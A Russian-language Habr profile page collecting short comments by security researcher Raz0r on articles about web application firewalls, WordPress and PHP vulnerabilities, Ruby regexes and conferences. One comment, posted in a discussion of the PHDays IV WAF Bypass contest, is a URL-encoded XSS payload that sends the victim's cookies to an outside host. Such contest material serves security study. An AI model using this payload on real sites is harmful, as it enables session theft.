Комментарии / Профиль Raz0r / Хабр

Raz0r @Raz0r

Пользователь

ПрофильСтатьи6ПостыНовостиКомментарии178

Защита корпоративных приложений: как стать разработчиком PT Application Firewall

Raz0r 9 сен 2015 в 10:59

Сейчас используем libnids + libpcap, также есть работающая версия на netmap, но ее нужно развивать.

Защита корпоративных приложений: как стать разработчиком PT Application Firewall

Raz0r 9 сен 2015 в 10:48

Нет, будем писать свою кибану.

84% сайтов на WordPress могут быть взломаны: что дальше?

Raz0r 30 ноя 2014 в 17:39

Мы сделали это с помощью angular-ui-codemirror.

84% сайтов на WordPress могут быть взломаны: что дальше?

Raz0r 28 ноя 2014 в 20:15

В сторонних плагинах для комментирования, например Disqus или Cackle, уязвимость отсутствует, так как форматирование HTML не производится вордпрессом.

84% сайтов на WordPress могут быть взломаны: что дальше?

Raz0r 28 ноя 2014 в 20:05

Этот пост про конкретную уязвимость, наверно она и имелась в виду.

84% сайтов на WordPress могут быть взломаны: что дальше?

Raz0r 28 ноя 2014 в 20:04

Да, с kibana можно делать отличные дашборды, мы разрабатываем еще более удобный форк.

84% сайтов на WordPress могут быть взломаны: что дальше?

Raz0r 28 ноя 2014 в 14:00

Да, верно.

Разбор заданий конкурса WAF Bypass на PHDays IV

Raz0r 15 июл 2014 в 07:48

http://task6.waf-bypass.phdays.com/sanitize.php?test=%3Ca+href=%22http://waf-bypass.phdays.com/%23bot%22%3Ehttp://waf-bypass.phdays.com/%23bot%3C/a%3E&name=%3Cscript%3Edocument.location.href=%27http://webmalware.lvk.cs.msu.su?%27%2bdocument.cookie%3C/script%3E

Внутренняя кухня организации PyCon Russia и международные отношения

Raz0r 12 мая 2014 в 20:10

Кстати, после прошлого PyCon образовалась как минимум одна семейная пара: девушка-организатор вышла замуж за докладчика.

Это вы про Армина Ронахера, создателя Flask?

Подборка трюков при анализе защищенности веб приложений

Raz0r 26 янв 2014 в 17:49

Вопрос: этот японский вектор кто-нибудь знал кроме самих японцев до того, как появился XXE OOB?

Принципиально новый накопитель от нижегородских школьников

Raz0r 22 июл 2013 в 18:41

+17

ICQ, новые функции — новые дыры

Raz0r 16 июн 2013 в 19:13

После прочтения ощущение, как будто на дворе начало нулевых.

+52

CONFidence. Опять о том, как там круто

Raz0r 10 июн 2013 в 14:45

Было очень атмосферно и душевно, очень понравилось отношение к спикерам. Но самое клевое — это идея проведения на открытом воздухе, организаторам зачет!

Как превратить браузер в notepad за 1 секунду

Raz0r 31 янв 2013 в 15:40

Ну теперь заживем!

С праздником, безопасники!

Raz0r 30 ноя 2012 в 09:51

надо было на NASM'е

Базовые sql-инъекции в приложениях, использующих язык SQL. Руководство для чайников

Raz0r 6 ноя 2012 в 19:02

Ответственный за разработку iOS покинул компанию Apple

Raz0r 30 окт 2012 в 06:46

+30

Безопасность случайных чисел в Python

Raz0r 28 окт 2012 в 10:00

Что rand, что mt_rand — обе функции небезопасны и дело даже не в них, а в том, что в PHP сид задается одинаково, причем одинаково плохо и предсказуемо. Общались по этому поводу с разработчиками PHP, однако ничего менять они не собираются, согласились лишь добавить плашку в документации, хотя и той не видно.

Использование регулярных выражений в Ruby

Raz0r 27 окт 2012 в 17:20

Нет, так же работает.

Использование регулярных выражений в Ruby

Raz0r 27 окт 2012 в 14:51

Забыли главную особенность регулярок в Руби: homakov.blogspot.com/2012/05/saferweb-injects-in-various-ruby.html

3 4 ...

8 9